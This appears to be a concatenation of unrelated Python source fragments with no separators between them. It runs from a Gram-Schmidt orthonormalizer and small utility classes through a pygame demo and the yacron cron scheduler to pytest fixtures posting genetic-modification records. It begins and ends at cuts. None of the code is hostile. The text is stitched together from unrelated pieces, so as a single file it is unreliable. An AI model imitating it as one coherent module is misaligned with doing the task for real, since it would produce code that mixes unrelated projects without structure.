
    Orthonormalizes the rows of *y* in place and returns the vector of
    norms measured just before each row was normalized.
    """

    n = y.shape[0]
    if y.shape[1] != n:
        raise ValueError("Invalid shape: {}".format(y.shape))

    norms = np.zeros(n)
    for i in range(n):
        # Subtract the projections onto the already-processed rows
        for j in range(i):
            y[i] -= y[j] * np.sum(y[j] * y[i])

        # Record the residual norm, then normalize the row
        norms[i] = np.linalg.norm(y[i])
        y[i] /= norms[i]

    return norms

class use_backend(object):
    """Context manager that temporarily switches the matplotlib backend
    of the running IPython shell, restoring the previous one on exit."""

    def __init__(self, backend):
        import matplotlib.pyplot as plt
        from IPython.core.interactiveshell import InteractiveShell
        from IPython.core.pylabtools import backend2gui

        self.shell = InteractiveShell.instance()
        # Remember the currently active backend so __exit__ can restore it
        self.old_backend = backend2gui[str(plt.get_backend())]
        self.new_backend = backend

    def __enter__(self):
        gui, backend = self.shell.enable_matplotlib(self.new_backend)

    def __exit__(self, type, value, tb):
        gui, backend = self.shell.enable_matplotlib(self.old_backend)

def inherit_docs(cls):
    """Class decorator: copy missing docstrings from base classes.

    For every attribute of *cls* lacking a docstring, the first base class
    (in ``__bases__`` order) that provides a documented attribute of the
    same name donates its docstring.
    """
    for name, member in vars(cls).items():
        if member.__doc__:
            continue
        for parent in cls.__bases__:
            try:
                parent_member = getattr(parent, name)
            except AttributeError:  # parent doesn't have this attribute
                break
            if parent_member and getattr(parent_member, '__doc__', None):
                member.__doc__ = parent_member.__doc__
                break
    return cls

# Fix: `collections.Mapping` was removed in Python 3.10; fall back for Py2.
try:
    from collections.abc import Mapping as _Mapping  # Python 3.3+
except ImportError:  # pragma: no cover - Python 2
    from collections import Mapping as _Mapping


class ImmutableDict(_Mapping):
    """Hashable, read-only mapping backed by a private dict snapshot."""

    def __init__(self, somedict):
        self._dict = dict(somedict)   # make a copy
        self._hash = None  # computed lazily on first hash()

    def __getitem__(self, key):
        return self._dict[key]

    def __len__(self):
        return len(self._dict)

    def __iter__(self):
        return iter(self._dict)

    def __hash__(self):
        # Safe to cache: the underlying dict never changes.
        if self._hash is None:
            self._hash = hash(frozenset(self._dict.items()))
        return self._hash

    def __eq__(self, other):
        # Fix: comparing against a plain dict/mapping used to raise
        # AttributeError because `other._dict` was accessed unconditionally.
        if isinstance(other, ImmutableDict):
            return self._dict == other._dict
        return self._dict == other

    def __ne__(self, other):
        return not self.__eq__(other)

from notifications_utils.clients.antivirus.antivirus_client import (
    AntivirusClient,
)
from notifications_utils.clients.redis.redis_client import RedisClient
from notifications_utils.clients.zendesk.zendesk_client import ZendeskClient

# Module-level client instances, shared by everything that imports this module.
antivirus_client = AntivirusClient()
zendesk_client = ZendeskClient()
redis_client = RedisClient()

#!/usr/bin/env python

import pygame

# Initialise only the subsystems this script needs (display + fonts).
pygame.display.init()
pygame.font.init()

# Supported fullscreen modes, sorted largest first by pygame.
modes_list = pygame.display.list_modes()
#screen = pygame.display.set_mode(modes_list[0], pygame.FULLSCREEN)   # the highest resolution with fullscreen
screen = pygame.display.set_mode(modes_list[-1])                     # the lowest resolution

background_color = (255, 255, 255)
screen.fill(background_color)

# Render "Hello world!" in black with the default font at size 22.
font = pygame.font.Font(pygame.font.get_default_font(), 22)
text_surface = font.render("Hello world!", True, (0,0,0))
screen.blit(text_surface, (0,0))         # paste the text at the top left corner of the window

pygame.display.flip()                    # display the image

# Block on events until the window is closed or Escape is pressed.
while True:                              # main loop (event loop)
    event = pygame.event.wait()
    if(event.type == pygame.QUIT or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE)):
        break

import asyncio
import asyncio.subprocess
import datetime
import logging
from collections import OrderedDict, defaultdict
from typing import Any, Awaitable, Dict, List, Optional, Union  # noqa
from urllib.parse import urlparse
from aiohttp import web
import yacron.version
from yacron.config import (
    JobConfig,
    parse_config,
    ConfigError,
    parse_config_string,
    WebConfig,
)
from yacron.job import RunningJob, JobRetryState
from crontab import CronTab  # noqa

# Package-wide logger for the scheduler.
logger = logging.getLogger("yacron")
# Interval between scheduler wake-ups (used by next_sleep_interval).
WAKEUP_INTERVAL = datetime.timedelta(minutes=1)


def naturaltime(seconds: float, future=False) -> str:
    """Render a positive offset in seconds as a human-readable
    "in N unit(s)" string (seconds, minutes, hours or days)."""
    assert future  # only the 'in the future' phrasing is implemented
    if seconds < 120:
        return "in {} second{}".format(int(seconds), "s" if seconds >= 2 else "")
    minutes = seconds / 60
    if minutes < 120:
        return "in {} minute{}".format(int(minutes), "s" if minutes >= 2 else "")
    hours = minutes / 60
    if hours < 48:
        return "in {} hour{}".format(int(hours), "s" if hours >= 2 else "")
    days = hours / 24
    return "in {} day{}".format(int(days), "s" if days >= 2 else "")


def get_now(timezone: Optional[datetime.tzinfo]) -> datetime.datetime:
    """Current time as a datetime in *timezone* (naive when None)."""
    return datetime.datetime.now(tz=timezone)


def next_sleep_interval() -> float:
    """Seconds to sleep until the next wakeup tick (minute-aligned)."""
    now = get_now(datetime.timezone.utc)
    next_tick = now.replace(second=0) + WAKEUP_INTERVAL
    return (next_tick - now).total_seconds()


def create_task(coro: Awaitable) -> asyncio.Task:
    """Schedule *coro* on the current event loop and return its Task."""
    loop = asyncio.get_event_loop()
    return loop.create_task(coro)


def web_site_from_url(runner: web.AppRunner, url: str) -> web.BaseSite:
    """Build an aiohttp listening site for *url*.

    Supports http:// (TCP) and unix:// (socket path) schemes; any other
    scheme is logged and rejected with ValueError.
    """
    parsed = urlparse(url)
    scheme = parsed.scheme
    if scheme == "http":
        assert parsed.hostname is not None
        assert parsed.port is not None
        return web.TCPSite(runner, parsed.hostname, parsed.port)
    if scheme == "unix":
        return web.UnixSite(runner, parsed.path)
    logger.warning(
        "Ignoring web listen url %s: scheme %r not supported",
        url,
        scheme,
    )
    raise ValueError(url)


class Cron:
    """Yacron's scheduler.

    Owns the desired job list (from configuration), the currently running
    jobs, per-job retry state, and the optional status/control web server.

    Fixes relative to the previous revision:
    - ``schedule_retry_job`` was missing a ``return`` after logging that a
      job disappeared from the configuration, so it fell through and raised
      ``NameError`` on the unbound ``job`` variable.
    - In ``start_stop_web_app`` the ``try/except ValueError`` wrapped
      ``site.start()``, but the call that actually raises ``ValueError``
      for unsupported schemes is ``web_site_from_url``; the guard now wraps
      the site creation, and success is logged after the site has started.
    """

    def __init__(
        self, config_arg: Optional[str], *, config_yaml: Optional[str] = None
    ) -> None:
        """``config_arg`` is a config file/dir path (may be None);
        ``config_yaml`` is a raw YAML string used by unit tests instead."""
        # list of cron jobs we /want/ to run
        self.cron_jobs = OrderedDict()  # type: Dict[str, JobConfig]
        # list of cron jobs already running
        # name -> list of RunningJob
        self.running_jobs = defaultdict(
            list
        )  # type: Dict[str, List[RunningJob]]
        self.config_arg = config_arg
        if config_arg is not None:
            self.update_config()
        if config_yaml is not None:
            # config_yaml is for unit testing
            config, _, _ = parse_config_string(config_yaml, "")
            self.cron_jobs = OrderedDict((job.name, job) for job in config)

        self._wait_for_running_jobs_task = None  # type: Optional[asyncio.Task]
        self._stop_event = asyncio.Event()
        self._jobs_running = asyncio.Event()
        self.retry_state = {}  # type: Dict[str, JobRetryState]
        self.web_runner = None  # type: Optional[web.AppRunner]
        self.web_config = None  # type: Optional[WebConfig]

    async def run(self) -> None:
        """Main loop: reload config, spawn due jobs, sleep to next minute.

        Runs until :meth:`signal_shutdown` is called, then cancels pending
        retries, waits for running jobs to finish, and stops the web server.
        """
        self._wait_for_running_jobs_task = create_task(
            self._wait_for_running_jobs()
        )

        startup = True
        while not self._stop_event.is_set():
            try:
                web_config = self.update_config()
                await self.start_stop_web_app(web_config)
            except ConfigError as err:
                # Keep running with the previous config on config errors.
                logger.error(
                    "Error in configuration file(s), so not updating "
                    "any of the config.:\n%s",
                    str(err),
                )
            except Exception:  # pragma: nocover
                logger.exception("please report this as a bug (1)")
            await self.spawn_jobs(startup)
            startup = False
            sleep_interval = next_sleep_interval()
            logger.debug("Will sleep for %.1f seconds", sleep_interval)
            try:
                await asyncio.wait_for(self._stop_event.wait(), sleep_interval)
            except asyncio.TimeoutError:
                pass

        logger.info("Shutting down (after currently running jobs finish)...")
        while self.retry_state:
            # cancel_job_retries pops entries from retry_state; build the
            # coroutine list before awaiting so iteration is complete first.
            cancel_all = [
                self.cancel_job_retries(name) for name in self.retry_state
            ]
            await asyncio.gather(*cancel_all)
        await self._wait_for_running_jobs_task

        if self.web_runner is not None:
            logger.info("Stopping http server")
            await self.web_runner.cleanup()

    def signal_shutdown(self) -> None:
        """Ask the main loop (and job waiter) to exit; safe to call once."""
        logger.debug("Signalling shutdown")
        self._stop_event.set()

    def update_config(self) -> Optional[WebConfig]:
        """Re-read configuration from ``config_arg``; return the web config.

        Returns ``None`` (and leaves jobs untouched) when no config path
        was given.  Raises ``ConfigError`` on invalid configuration.
        """
        if self.config_arg is None:
            return None
        config, web_config = parse_config(self.config_arg)
        self.cron_jobs = OrderedDict((job.name, job) for job in config)
        return web_config

    async def _web_get_version(self, request: web.Request) -> web.Response:
        """HTTP GET /version: plain-text yacron version."""
        return web.Response(text=yacron.version.version)

    async def _web_get_status(self, request: web.Request) -> web.Response:
        """HTTP GET /status: per-job status, as JSON or plain text.

        JSON is returned when the client sends ``Accept: application/json``;
        otherwise a human-readable one-line-per-job text response.
        """
        out = []
        for name, job in self.cron_jobs.items():
            running = self.running_jobs.get(name, None)
            if running:
                out.append(
                    {
                        "job": name,
                        "status": "running",
                        "pid": [
                            runjob.proc.pid
                            for runjob in running
                            if runjob.proc is not None
                        ],
                    }
                )
            else:
                crontab = job.schedule  # type: Union[CronTab, str]
                now = get_now(job.timezone)
                out.append(
                    {
                        "job": name,
                        "status": "scheduled",
                        # Seconds until next run for crontab schedules;
                        # the raw string for special ones (e.g. "@reboot").
                        "scheduled_in": (
                            crontab.next(now=now, default_utc=job.utc)
                            if isinstance(crontab, CronTab)
                            else str(crontab)
                        ),
                    }
                )
        if request.headers.get("Accept") == "application/json":
            return web.json_response(out)
        else:
            lines = []
            for jobstat in out:  # type: Dict[str, Any]
                if jobstat["status"] == "running":
                    status = "running (pid: {pid})".format(
                        pid=", ".join(str(pid) for pid in jobstat["pid"])
                    )
                else:
                    status = "scheduled ({})".format(
                        (
                            jobstat["scheduled_in"]
                            if type(jobstat["scheduled_in"]) is str
                            else naturaltime(
                                jobstat["scheduled_in"], future=True
                            )
                        )
                    )
                lines.append(
                    "{name}: {status}".format(
                        name=jobstat["job"], status=status
                    )
                )
            return web.Response(text="\n".join(lines))

    async def _web_start_job(self, request: web.Request) -> web.Response:
        """HTTP POST /jobs/{name}/start: launch a job on demand (404 if unknown)."""
        name = request.match_info["name"]
        try:
            job = self.cron_jobs[name]
        except KeyError:
            raise web.HTTPNotFound()
        await self.maybe_launch_job(job)
        return web.Response()

    async def start_stop_web_app(self, web_config: Optional[WebConfig]):
        """Reconcile the web server with *web_config*.

        Stops the running server when the config was removed or changed;
        starts a new one when a config with listen addresses is present
        and no server is running.
        """
        if self.web_runner is not None and (
            web_config is None or web_config != self.web_config
        ):
            logger.info("Stopping http server")
            await self.web_runner.cleanup()
            self.web_runner = None

        if (
            web_config is not None
            and web_config["listen"]
            and self.web_runner is None
        ):
            app = web.Application()
            app.add_routes(
                [
                    web.get("/version", self._web_get_version),
                    web.get("/status", self._web_get_status),
                    web.post("/jobs/{name}/start", self._web_start_job),
                ]
            )
            self.web_runner = web.AppRunner(app)
            await self.web_runner.setup()
            for addr in web_config["listen"]:
                try:
                    site = web_site_from_url(self.web_runner, addr)
                except ValueError:
                    # Unsupported scheme: web_site_from_url already logged
                    # a warning; skip this address instead of crashing.
                    continue
                await site.start()
                logger.info("web: started listening on %s", addr)
            self.web_config = web_config

    async def spawn_jobs(self, startup: bool) -> None:
        """Launch every configured job whose schedule matches right now."""
        for job in self.cron_jobs.values():
            if self.job_should_run(startup, job):
                await self.launch_scheduled_job(job)

    @staticmethod
    def job_should_run(startup: bool, job: JobConfig) -> bool:
        """Return True when *job* is due: "@reboot" at startup, or a
        crontab match against the current minute in the job's timezone."""
        if (
            startup
            and isinstance(job.schedule, str)
            and job.schedule == "@reboot"
        ):
            logger.debug(
                "Job %s (%s) is scheduled for startup (@reboot)",
                job.name,
                job.schedule_unparsed,
            )
            return True
        elif isinstance(job.schedule, CronTab):
            crontab = job.schedule  # type: CronTab
            if crontab.test(get_now(job.timezone).replace(second=0)):
                logger.debug(
                    "Job %s (%s) is scheduled for now",
                    job.name,
                    job.schedule_unparsed,
                )
                return True
            else:
                logger.debug(
                    "Job %s (%s) not scheduled for now",
                    job.name,
                    job.schedule_unparsed,
                )
                return False
        else:
            return False

    async def launch_scheduled_job(self, job: JobConfig) -> None:
        """Start a regularly scheduled run of *job*, resetting retry state."""
        await self.cancel_job_retries(job.name)
        assert job.name not in self.retry_state

        retry = job.onFailure["retry"]
        logger.debug("Job %s retry config: %s", job.name, retry)
        if retry["maximumRetries"]:
            retry_state = JobRetryState(
                retry["initialDelay"],
                retry["backoffMultiplier"],
                retry["maximumDelay"],
            )
            self.retry_state[job.name] = retry_state

        await self.maybe_launch_job(job)

    async def maybe_launch_job(self, job: JobConfig) -> None:
        """Start *job* subject to its concurrencyPolicy.

        "Allow" starts alongside running instances, "Forbid" skips the
        launch, "Replace" cancels the running instances first.
        """
        if self.running_jobs[job.name]:
            logger.warning(
                "Job %s: still running and concurrencyPolicy is %s",
                job.name,
                job.concurrencyPolicy,
            )
            if job.concurrencyPolicy == "Allow":
                pass
            elif job.concurrencyPolicy == "Forbid":
                return
            elif job.concurrencyPolicy == "Replace":
                for running_job in self.running_jobs[job.name]:
                    await running_job.cancel()
            else:
                raise AssertionError  # pragma: no cover
        logger.info("Starting job %s", job.name)
        running_job = RunningJob(job, self.retry_state.get(job.name))
        await running_job.start()
        self.running_jobs[job.name].append(running_job)
        logger.info("Job %s spawned", job.name)
        self._jobs_running.set()

    # continually watches for the running jobs, clean them up when they exit
    async def _wait_for_running_jobs(self) -> None:
        """Background task: reap finished jobs and dispatch success/failure.

        Loops until shutdown is signalled and no jobs remain running.
        """
        # job -> wait task
        wait_tasks = {}  # type: Dict[RunningJob, asyncio.Task]
        while self.running_jobs or not self._stop_event.is_set():
            try:
                for jobs in self.running_jobs.values():
                    for job in jobs:
                        if job not in wait_tasks:
                            wait_tasks[job] = create_task(job.wait())
                if not wait_tasks:
                    # Nothing to wait on: poll for new jobs (or shutdown)
                    # at most once a second.
                    try:
                        await asyncio.wait_for(self._jobs_running.wait(), 1)
                    except asyncio.TimeoutError:
                        pass
                    continue
                self._jobs_running.clear()
                # wait for at least one task with timeout
                done_tasks, _ = await asyncio.wait(
                    wait_tasks.values(),
                    timeout=1.0,
                    return_when=asyncio.FIRST_COMPLETED,
                )
                done_jobs = set()
                for job, task in list(wait_tasks.items()):
                    if task in done_tasks:
                        done_jobs.add(job)
                for job in done_jobs:
                    task = wait_tasks.pop(job)
                    try:
                        task.result()
                    except Exception:  # pragma: no cover
                        logger.exception("please report this as a bug (2)")

                    jobs_list = self.running_jobs[job.config.name]
                    jobs_list.remove(job)
                    if not jobs_list:
                        del self.running_jobs[job.config.name]

                    fail_reason = job.fail_reason
                    logger.info(
                        "Job %s exit code %s; has stdout: %s, "
                        "has stderr: %s; fail_reason: %r",
                        job.config.name,
                        job.retcode,
                        str(bool(job.stdout)).lower(),
                        str(bool(job.stderr)).lower(),
                        fail_reason,
                    )
                    if fail_reason is not None:
                        await self.handle_job_failure(job)
                    else:
                        await self.handle_job_success(job)
            except asyncio.CancelledError:
                raise
            except Exception:  # pragma: no cover
                logger.exception("please report this as a bug (3)")
                await asyncio.sleep(1)

    async def handle_job_failure(self, job: RunningJob) -> None:
        """Report a failed run and schedule a retry if the config allows."""
        if self._stop_event.is_set():
            return
        if job.stdout:
            logger.info(
                "Job %s STDOUT:\n%s", job.config.name, job.stdout.rstrip()
            )
        if job.stderr:
            logger.info(
                "Job %s STDERR:\n%s", job.config.name, job.stderr.rstrip()
            )
        await job.report_failure()

        # Handle retries...
        state = job.retry_state
        if state is None or state.cancelled:
            await job.report_permanent_failure()
            return

        logger.debug(
            "Job %s has been retried %i times", job.config.name, state.count
        )
        if state.task is not None:
            if state.task.done():
                await state.task
            else:
                state.task.cancel()
        retry = job.config.onFailure["retry"]
        if (
            state.count >= retry["maximumRetries"]
            and retry["maximumRetries"] != -1
        ):
            await self.cancel_job_retries(job.config.name)
            await job.report_permanent_failure()
        else:
            retry_delay = state.next_delay()
            state.task = create_task(
                self.schedule_retry_job(
                    job.config.name, retry_delay, state.count
                )
            )

    async def schedule_retry_job(
        self, job_name: str, delay: float, retry_num: int
    ) -> None:
        """Sleep *delay* seconds, then relaunch *job_name* (retry #retry_num)."""
        logger.info(
            "Cron job %s scheduled to be retried (#%i) " "in %.1f seconds",
            job_name,
            retry_num,
            delay,
        )
        await asyncio.sleep(delay)
        try:
            job = self.cron_jobs[job_name]
        except KeyError:
            logger.warning(
                "Cron job %s was scheduled for retry, but "
                "disappeared from the configuration",
                job_name,
            )
            # Bug fix: without this return, execution fell through to
            # maybe_launch_job with `job` unbound, raising NameError.
            return
        await self.maybe_launch_job(job)

    async def handle_job_success(self, job: RunningJob) -> None:
        """Cancel any pending retries and report success."""
        await self.cancel_job_retries(job.config.name)
        await job.report_success()

    async def cancel_job_retries(self, name: str) -> None:
        """Drop retry state for *name*, cancelling its pending retry task."""
        try:
            state = self.retry_state.pop(name)
        except KeyError:
            return
        state.cancelled = True
        if state.task is not None:
            if state.task.done():
                await state.task
            else:
                state.task.cancel()

import pytest


@pytest.fixture
def genetic_modification(testapp, lab, award):
    """Posted CRISPR deletion GM with coordinate-based modified site."""
    payload = dict(
        award=award['@id'],
        lab=lab['@id'],
        modified_site_by_coordinates=dict(
            assembly='GRCh38',
            chromosome='11',
            start=20000,
            end=21000,
        ),
        purpose='repression',
        category='deletion',
        method='CRISPR',
        zygosity='homozygous',
    )
    return testapp.post_json('/genetic_modification', payload).json['@graph'][0]


@pytest.fixture
def genetic_modification_RNAi(testapp, lab, award):
    """Posted RNAi deletion GM with coordinate-based modified site."""
    payload = dict(
        award=award['@id'],
        lab=lab['@id'],
        modified_site_by_coordinates=dict(
            assembly='GRCh38',
            chromosome='11',
            start=20000,
            end=21000,
        ),
        purpose='repression',
        category='deletion',
        method='RNAi',
    )
    return testapp.post_json('/genetic_modification', payload).json['@graph'][0]


@pytest.fixture
def genetic_modification_source(testapp, lab, award, source, gene):
    """Posted CRISPR insertion GM with an introduced gene and a reagent."""
    payload = dict(
        lab=lab['@id'],
        award=award['@id'],
        category='insertion',
        introduced_gene=gene['@id'],
        purpose='expression',
        method='CRISPR',
        reagents=[
            dict(
                source=source['@id'],
                identifier='sigma:ABC123',
            ),
        ],
    )
    return testapp.post_json('/genetic_modification', payload).json['@graph'][0]


@pytest.fixture
def crispr_deletion(lab, award):
    """Unposted payload: CRISPR deletion for repression."""
    return dict(
        lab=lab['@id'],
        award=award['@id'],
        category='deletion',
        purpose='repression',
        method='CRISPR',
    )


@pytest.fixture
def crispr_deletion_1(testapp, lab, award, target):
    """Posted CRISPR deletion GM with target and guide RNA sequences."""
    payload = dict(
        lab=lab['@id'],
        award=award['@id'],
        category='deletion',
        purpose='repression',
        method='CRISPR',
        modified_site_by_target_id=target['@id'],
        guide_rna_sequences=['ACCGGAGA'],
    )
    return testapp.post_json('/genetic_modification', payload).json['@graph'][0]



@pytest.fixture
def tale_deletion(lab, award):
    """Unposted payload: TALEN deletion, heterozygous."""
    return dict(
        lab=lab['@id'],
        award=award['@id'],
        category='deletion',
        purpose='repression',
        method='TALEN',
        zygosity='heterozygous',
    )


@pytest.fixture
def crispr_tag(lab, award):
    """Unposted payload: CRISPR insertion for tagging."""
    return dict(
        lab=lab['@id'],
        award=award['@id'],
        category='insertion',
        purpose='tagging',
        method='CRISPR',
    )


@pytest.fixture
def bombardment_tag(lab, award):
    """Unposted payload: tagging insertion delivered by bombardment."""
    return dict(
        lab=lab['@id'],
        award=award['@id'],
        category='insertion',
        purpose='tagging',
        nucleic_acid_delivery_method=['bombardment'],
    )


@pytest.fixture
def recomb_tag(lab, award):
    """Unposted payload: tagging insertion via site-specific recombination."""
    return dict(
        lab=lab['@id'],
        award=award['@id'],
        category='insertion',
        purpose='tagging',
        method='site-specific recombination',
    )


@pytest.fixture
def transfection_tag(lab, award):
    """Unposted payload: tagging insertion via stable transfection."""
    return dict(
        lab=lab['@id'],
        award=award['@id'],
        category='insertion',
        purpose='tagging',
        nucleic_acid_delivery_method=['stable transfection'],
    )


@pytest.fixture
def crispri(lab, award):
    """Unposted payload: CRISPR interference for repression."""
    return dict(
        lab=lab['@id'],
        award=award['@id'],
        category='interference',
        purpose='repression',
        method='CRISPR',
    )


@pytest.fixture
def rnai(lab, award):
    """Unposted payload: RNAi interference for repression."""
    return dict(
        lab=lab['@id'],
        award=award['@id'],
        category='interference',
        purpose='repression',
        method='RNAi',
    )


@pytest.fixture
def mutagen(lab, award):
    """Unposted payload: mutagenesis by mutagen treatment."""
    return dict(
        lab=lab['@id'],
        award=award['@id'],
        category='mutagenesis',
        purpose='repression',
        method='mutagen treatment',
    )


@pytest.fixture
def tale_replacement(lab, award):
    """Unposted payload: TALEN replacement, heterozygous."""
    return dict(
        lab=lab['@id'],
        award=award['@id'],
        category='replacement',
        purpose='characterization',
        method='TALEN',
        zygosity='heterozygous',
    )


@pytest.fixture
def mpra(lab, award):
    """Unposted payload: MPRA-style insertion delivered by transduction."""
    return dict(
        lab=lab['@id'],
        award=award['@id'],
        category='insertion',
        purpose='characterization',
        nucleic_acid_delivery_method=['transduction'],
    )


@pytest.fixture
def starr_seq(lab, award):
    """Unposted payload: STARR-seq episome via transient transfection."""
    return dict(
        lab=lab['@id'],
        award=award['@id'],
        category='episome',
        purpose='characterization',
        nucleic_acid_delivery_method=['transient transfection'],
    )


@pytest.fixture
def introduced_elements(lab, award):
    """Unposted payload: episome carrying genomic DNA regions."""
    return dict(
        lab=lab['@id'],
        award=award['@id'],
        category='episome',
        purpose='characterization',
        nucleic_acid_delivery_method=['transient transfection'],
        introduced_elements='genomic DNA regions',
    )

@pytest.fixture
def crispr_tag_1(testapp, lab, award, ctcf):
    """Posted CRISPR tagging GM on the CTCF gene with a mAID-mClover tag."""
    payload = dict(
        lab=lab['@id'],
        award=award['@id'],
        category='insertion',
        purpose='tagging',
        method='CRISPR',
        modified_site_by_gene_id=ctcf['@id'],
        introduced_tags=[dict(name='mAID-mClover', location='C-terminal')],
    )
    return testapp.post_json('/genetic_modification', payload).json['@graph'][0]


@pytest.fixture
def mpra_1(testapp, lab, award):
    """Posted MPRA-style insertion GM with synthesized DNA at random sites."""
    payload = dict(
        lab=lab['@id'],
        award=award['@id'],
        category='insertion',
        purpose='characterization',
        nucleic_acid_delivery_method=['transduction'],
        introduced_elements='synthesized DNA',
        modified_site_nonspecific='random',
    )
    return testapp.post_json('/genetic_modification', payload).json['@graph'][0]


@pytest.fixture
def recomb_tag_1(testapp, lab, award, target, treatment_5, document):
    """Posted tagging GM via site-specific recombination.

    Fix: the original dict literal listed the 'category' key twice with the
    same value ('insertion'); in a dict literal the later entry silently
    overwrites the earlier one, so the duplicate was dead code and has been
    removed.  The resulting dict is identical.
    """
    item = {
        'lab': lab['@id'],
        'award': award['@id'],
        'category': 'insertion',
        'purpose': 'tagging',
        'method': 'site-specific recombination',
        'modified_site_by_target_id': target['@id'],
        'modified_site_nonspecific': 'random',
        'treatments': [treatment_5['@id']],
        'documents': [document['@id']],
        'introduced_tags': [{'name': 'eGFP', 'location': 'C-terminal'}]
    }
    return testapp.post_json('/genetic_modification', item).json['@graph'][0]


@pytest.fixture
def rnai_1(testapp, lab, award, source, target):
    """Posted RNAi interference GM with reagent, sequences and target."""
    payload = dict(
        lab=lab['@id'],
        award=award['@id'],
        category='interference',
        purpose='repression',
        method='RNAi',
        reagents=[dict(source=source['@id'], identifier='addgene:12345')],
        rnai_sequences=['ATTACG'],
        modified_site_by_target_id=target['@id'],
    )
    return testapp.post_json('/genetic_modification', payload).json['@graph'][0]


@pytest.fixture
def genetic_modification_1(lab, award):
    """Unposted payload using legacy schema property names.

    NOTE(review): 'modifiction_description' is misspelled in the original;
    it is a runtime dict key and presumably intentional for schema-upgrade
    or validation tests, so it is preserved verbatim — confirm before fixing.
    """
    return dict(
        modification_type='deletion',
        award=award['uuid'],
        lab=lab['uuid'],
        modifiction_description='some description',
    )


@pytest.fixture
def genetic_modification_2(lab, award):
    """Unposted payload using legacy 'modification_*' schema properties."""
    return dict(
        modification_type='deletion',
        award=award['uuid'],
        lab=lab['uuid'],
        modification_description='some description',
        modification_zygocity='homozygous',
        modification_purpose='tagging',
        modification_treatments=[],
        modification_genome_coordinates=[
            dict(
                chromosome='11',
                start=5309435,
                end=5309451,
            ),
        ],
    )


@pytest.fixture
def crispr_gm(lab, award, source):
    """Unposted legacy Crispr technique object with embedded @id/@type/uuid."""
    technique = dict(
        lab=lab['uuid'],
        award=award['uuid'],
        source=source['uuid'],
        guide_rna_sequences=[
            "ACA",
            "GCG",
        ],
        insert_sequence='TCGA',
        aliases=['encode:crispr_technique1'],
    )
    # '@'-prefixed keys are not valid keyword arguments, so add them after.
    technique['@type'] = ['Crispr', 'ModificationTechnique', 'Item']
    technique['@id'] = '/crisprs/79c1ec08-c878-4419-8dba-66aa4eca156b/'
    technique['uuid'] = '79c1ec08-c878-4419-8dba-66aa4eca156b'
    return technique


@pytest.fixture
def genetic_modification_5(lab, award, crispr_gm):
    """Unposted legacy payload embedding a modification technique object."""
    return dict(
        modification_type='deletion',
        award=award['uuid'],
        lab=lab['uuid'],
        description='blah blah description blah',
        zygosity='homozygous',
        treatments=[],
        source='sigma',
        product_id='12345',
        modification_techniques=[crispr_gm],
        modified_site=[
            dict(
                assembly='GRCh38',
                chromosome='11',
                start=5309435,
                end=5309451,
            ),
        ],
    )


@pytest.fixture
def genetic_modification_6(lab, award, crispr_gm, source):
    """Unposted payload with a reagent referencing the source by uuid.

    NOTE(review): the category value 'deeltion' is misspelled in the
    original; it is runtime data and may be intentional (e.g. to exercise
    validation), so it is preserved verbatim — confirm before fixing.
    """
    return dict(
        purpose='validation',
        category='deeltion',
        award=award['uuid'],
        lab=lab['uuid'],
        description='blah blah description blah',
        method="CRISPR",
        modified_site_by_target_id="/targets/FLAG-ZBTB43-human/",
        reagents=[
            dict(
                identifier="placeholder_id",
                source=source['uuid'],
            ),
        ],
    )


@pytest.fixture
def genetic_modification_7_invalid_reagent(lab, award, crispr_gm):
    """Unposted payload with a placeholder reagent identifier (invalid)."""
    return dict(
        purpose='characterization',
        category='deletion',
        award=award['uuid'],
        lab=lab['uuid'],
        description='blah blah description blah',
        method="CRISPR",
        modified_site_by_target_id="/targets/FLAG-ZBTB43-human/",
        reagents=[
            dict(
                identifier="placeholder_id",
                source="/sources/sigma/",
            ),
        ],
    )


@pytest.fixture
def genetic_modification_7_valid_reagent(lab, award, crispr_gm):
    """Unposted payload with a valid-looking reagent identifier."""
    return dict(
        purpose='characterization',
        category='deletion',
        award=award['uuid'],
        lab=lab['uuid'],
        description='blah blah description blah',
        method="CRISPR",
        modified_site_by_target_id="/targets/FLAG-ZBTB43-human/",
        reagents=[
            dict(
                identifier="ABC123",
                source="/sources/sigma/",
            ),
        ],
    )


@pytest.fixture
def genetic_modification_7_addgene_source(testapp):
    """Posted 'addgene' source used by the reagent-matching tests."""
    payload = dict(
        name='addgene',
        title='Addgene',
        status='released',
    )
    return testapp.post_json('/source', payload).json['@graph'][0]


@pytest.fixture
def genetic_modification_7_multiple_matched_identifiers(lab, award, crispr_gm):
    """Unposted payload whose reagent identifier matches multiple entries."""
    return dict(
        purpose='characterization',
        category='deletion',
        award=award['uuid'],
        lab=lab['uuid'],
        description='blah blah description blah',
        method="CRISPR",
        modified_site_by_target_id="/targets/FLAG-ZBTB43-human/",
        reagents=[
            dict(
                identifier="12345",
                source="/sources/addgene/",
            ),
        ],
    )


@pytest.fixture
def genetic_modification_7_multiple_reagents(lab, award, crispr_gm):
    """Unposted payload carrying two addgene reagents with URLs."""
    return dict(
        purpose='characterization',
        category='deletion',
        award=award['uuid'],
        lab=lab['uuid'],
        description='blah blah description blah',
        method="CRISPR",
        modified_site_by_target_id="/targets/FLAG-ZBTB43-human/",
        reagents=[
            dict(
                identifier="12345",
                source="/sources/addgene/",
                url="http://www.addgene.org",
            ),
            dict(
                identifier="67890",
                source="/sources/addgene/",
                url="http://www.addgene.org",
            ),
        ],
    )


@pytest.fixture
def genetic_modification_8(lab, award):
    """Unposted payload: CRISPR interference for analysis."""
    return dict(
        purpose='analysis',
        category='interference',
        award=award['uuid'],
        lab=lab['uuid'],
        method="CRISPR",
    )


@pytest.fixture
def construct_genetic_modification(
        testapp,
        lab,
        award,
        document,
        target_ATF5_genes,
        target_promoter):
    """Posted C-terminal eGFP tagging GM with an explicit promoter."""
    payload = dict(
        award=award['@id'],
        documents=[document['@id']],
        lab=lab['@id'],
        category='insertion',
        purpose='tagging',
        nucleic_acid_delivery_method=['stable transfection'],
        introduced_tags=[
            dict(
                name='eGFP',
                location='C-terminal',
                promoter_used=target_promoter['@id'],
            ),
        ],
        modified_site_by_target_id=target_ATF5_genes['@id'],
    )
    return testapp.post_json('/genetic_modification', payload).json['@graph'][0]


@pytest.fixture
def construct_genetic_modification_N(
        testapp,
        lab,
        award,
        document,
        target):
    """Posted N-terminal eGFP tagging GM."""
    payload = dict(
        award=award['@id'],
        documents=[document['@id']],
        lab=lab['@id'],
        category='insertion',
        purpose='tagging',
        nucleic_acid_delivery_method=['stable transfection'],
        introduced_tags=[dict(name='eGFP', location='N-terminal')],
        modified_site_by_target_id=target['@id'],
    )
